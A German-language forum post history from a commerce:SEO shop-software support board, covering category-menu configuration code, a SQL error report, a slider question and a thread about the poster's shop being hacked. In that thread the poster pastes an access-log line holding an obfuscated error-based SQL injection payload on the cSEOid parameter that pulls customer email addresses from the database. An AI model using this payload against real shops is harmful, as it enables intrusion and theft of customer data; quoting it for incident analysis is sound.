Beiträge von ErnstSteininger
-
-
Danke für die TIPPS!!!
-
Danke schau ich gleich mal
-
Hi Jotest,
Template: v2next-boot-flat-3col
Shopversion: commerce:seo v2next 2.5.10
Das Kategoriemenü oben quer über die Seite - wenn du dort zb auf Beamer klickst werden alle sub und subsub Kategorien angezeigt (sprich in Summe 3 Ebenen).
Ich habe meinen Shop auf http://test.beamer.at, detto dort oben am Kategoriemenü. Es wird bei Mouseover aber immer das aktuelle plus die daturnter liegende Subkategorie angezeigt. -
Wie muss man den die Navigationsparameter setzen, dass man bei Mouseover oder klick ein vollständig herausgeklapptes Navigationsmenü inkl. aller Sub-Menüs bekommt. >> so ähnlich wie bei http://www.beamershop24.net/
Hab gesehen, dass es einen parameter #expand# gibt, merke aber bei der Eingabe in der Datei shop_nav.php keine Änderung.
>> shop_nav.php
<div class="expand navbar-expand" id="catnav">
{$BOX_cat_nav}
</div>>> Cat_nav.php
$CatConfig = array(
'MinLevel' => 5,
'MaxLevel' => false,
'HideEmpty' => false,
'ShowAktSub' => true,
'ListPrefix' => 'catmenu',
'MarkAktivLink' => true,
'LinkCurrent' => 'active',
'LinkCurrentParent' => 'active',
'MarkAktivList' => true,
'ListCurrent' => 'active',
'ListCurrentParent' => 'active',
'MarkSubMenue' => true,
'SubMenueCss' => '',
'ShowCssIdList' => false,
'CssPrefixList' => 'MyCat',
'ShowCssIdLink' => false,
'CssPrefixLink' => 'MyCatLink',
'CountPre' => '<em>(',
'CountAfter' => ')</em>',
// Tags außerhalb des Links?
'LinkPre' => false, // z.B. '<div>',
'LinkAfter' => false, // z.B. '</div>',
// Tags innerhalb des Links?
'NamePre' => false, // z.B. '<span>',
'NameAfter' => false, // z.B. '</span>',
'CssMarkersToList' => false, // Gefundene Marker zur Liste?
'CssMarkersToLink' => false // Gefundene Marker zum Link?
);....
// Wenn Expand, dann ausgeklappt
if ($ShowSub $Expand) {
xtc_show_category_superfish($key, $level + 1, $foo, ($level != 0 ? $cpath . $cid . '_' : ''));
} -
-
Hi Altoba,
das mit den Filtern in 2.6 steht hier http://plussupport.commerce-seo.de/showthread.php…ght=v2.6+filter
-
-
-
Nein, ist das Standard "v2next-boot-flat" template. Die Fehlermeldung kommt auch nur alle paar Tage ein mal.
-
Da hast du recht, aber das ist eine original Installation ohne Änderung (außer in der Template-die hat mit dem aber nichts zu tun). Das heißt irgendwo steckt ein Fehler, oder?
Hab die Meldung in der Zwischenzeit schon 2 x bekommen! -
Hi,
hat jemand eine Idee warum diese fehlermeldung kommt?
Version: commerce:SEO v2next 2.5.7
256 - (1054) Unknown column 'j.css_path' in 'where clause'
SELECT products_id FROM products_description WHERE url_old_text = 'shopscripte/js/'+j.css_path+'' AND language_id='2';
Request URL: http://www.hagerty.at/shopscripte/js/'+j.css_path+'
[CSEO SQL Error]
-
Lieber Admin, wie ich dir gerade per Mail mitgeteilt hatte, wurde dieses Update wurde von mir am 15.12.2013 eingespielt! Und trotzdem wurde der Shop gehackt.
-
Da sieht man das er die cSEOid für den Hack missbraucht hat, wie gesagt schick dir gerne den ganzen log
-
?cSEOid=3u68al8js50rgvt7996b5hgog0'/**/and/**/(SeLeCt/**/1/**/FrOm(SeLeCt/**/count(*),CoNcAt((SeLeCt(SeLeCt(SeLeCt/**/CoNcAt(0x217e21,customers_email_address,0x217e21)/**/FrOm/**/xxxx_db1.customers/**/LiMiT/**/64,1))/**/FrOm/**/information_schema.TaBlEs/**/LiMiT/**/0,1),floor(rand(0)*2))x/**/FrOm/**/information_schema.TaBlEs/**/GrOuP/**/By/**/x)a)/**/and/**/'1'='1 HTTP/1.1" 200 698 "http://www.xxx.xx/de/xxxx/?cSEOid=3u68al8js50rgvt7996b5hgog0'/**/and/**/(SeLeCt/**/1/**/FrOm(SeLeCt/**/count(*),CoNcAt((SeLeCt(SeLeCt(SeLeCt/**/CoNcAt(0x217e21,customers_email_address,0x217e21)/**/FrOm/**/xxxx_db1.customers/**/LiMiT/**/64,1))/**/FrOm/**/information_schema.TaBlEs/**/LiMiT/**/0,1),floor(rand(0)*2))x/**/FrOm/**/information_schema.TaBlEs/**/GrOuP/**/By/**/x)a)/**/and/**/'1'='1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
-
ich kann die gerne als pn das logfile senden
-
DANKE! Hab es gefunden
-
Hi, wenn man im Slidermanager ein Sliderset definiert, wie bekommt man es dann auf den Seiten angezeigt?
Möchte auf der Startseite einen Slider anzeigen, das Set habe ich Startseite genannt. Wie erscheint das Ding dann, muss ich da wo einen Code für das Placement einfügen? -
Guten Morgen,
die Sache mit den Hacked Accounts hab ich überprüft, trifft nicht zu.
Mir hat ein Kollege der Security Spezialist ist gesagt, dass man bei einer SQL Injection gar kein Admin Passwort braucht.
Auf Grund der SQL Injectionstechnik umgeht er mit Commandos das Passwort und kann trotzdem als admin einloggen.Werde mal schnell den Shop auf die aktuelle Version umbauen.
-
Servus Jotest,
danke die Security Updates hatte ich immer auch gemacht. Scheinbar gibt es hier trotzdem immer noch eine Möglichkeit mit sql Injections die db auszulesen.
Passwörter hatte ich gleich wärend des Angriffes geändert und als Erstmaßnahme auch den admin ordner im ftp umbenannt, danach hab ich den Folder mit .htaccess abgesichert. Es war nur eine Datei im den Media Folder geladen worden. Die hab ich gesichert.
Was ich nicht verstehe ist, wie man bei einer sql injection zu einem passwort kommt das eigentlich codiert ist!
Dieses passwort brauchte er doch um als Admin einzusteigen, oder geht das anders?